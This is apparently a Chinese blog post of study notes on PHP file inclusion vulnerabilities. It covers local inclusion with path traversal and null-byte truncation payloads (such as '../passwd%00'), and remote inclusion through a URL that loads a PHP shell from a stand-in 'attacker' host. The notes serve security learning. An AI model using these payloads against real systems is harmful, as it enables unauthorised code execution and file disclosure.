【白帽子】文件包含漏洞

0x00 前言

看《白帽子讲web安全》的笔记,自己实际操作一下再记录一下感觉印象比较深刻

0x01 文件包含漏洞

PHP的文件包含漏洞是最常见的,在PHP中文件包含主要由4个函数完成:

include()
require()
include_once()  //只包含一次,如果该文件包含过了,就不能再包含了
require_once()

当使用这4个函数包含一个新的文件时,该文件将作为PHP代码执行,PHP内核并不会在意该被包含的文件是什么类型,所以如果被包含的是txt、图片、远程URL也将作为PHP代码执行



fortest.txt
把fortest.txt当作php执行

但是当fortest.txt中加入可执行的php代码时:


在fortest.txt中加入可执行的php代码
fortest.txt中的php代码被执行

要想成功利用文件包含漏洞,需要满足下面两个条件:

  • include()等函数通过动态变量的方式引入需要包含的文件;
  • 用户能够控制该动态变量

0x02 本地文件包含

能够打开并包含本地文件的漏洞,被称为本地文件包含漏洞(Local File Inclusion,简称LFI漏洞)


$file=$_GET['file'];
if(file_exists('/home/test/'.$file.'.php')){
    include '/home/test/'.$file.'.php';
}
?>

当我们将$file的值赋值为../passwd时,其实被包含的文件是/home/passwd.php,但是并没有passwd.php文件(存在passwd文件),所以需要利用C语言(PHP内核是由C语言完成的)中的一些字符串的处理方法——在链接字符串时,0字节(\x00)将作为字符串结束符。所以,只要在最后加入一个0字节,就能截断file变量之后的字符串

../passwd%00              //web输入时,将\0进行URL编码

如果'\0'被替换掉了,也可以利用操作系统对目录的最大长度的限制,达到截断的目标
例如:

././././././././././././././././abc
//////////////////////////abc

0x03 远程文件包含

如果php的配置选项allow_url_include为on的话,则include/require函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞(Remote File Include,简称RFI)


因为在$basePath前面没有任何障碍,所以构造
/?param=hettp://attacker/phpshell.txt?
最终加载的代码实际上执行了:
require_once 'hettp://attacker/phpshell.txt?/action/m_share.php'
?后面的代码被截断了,也可以用%00来截断

你可能感兴趣的:(【白帽子】文件包含漏洞)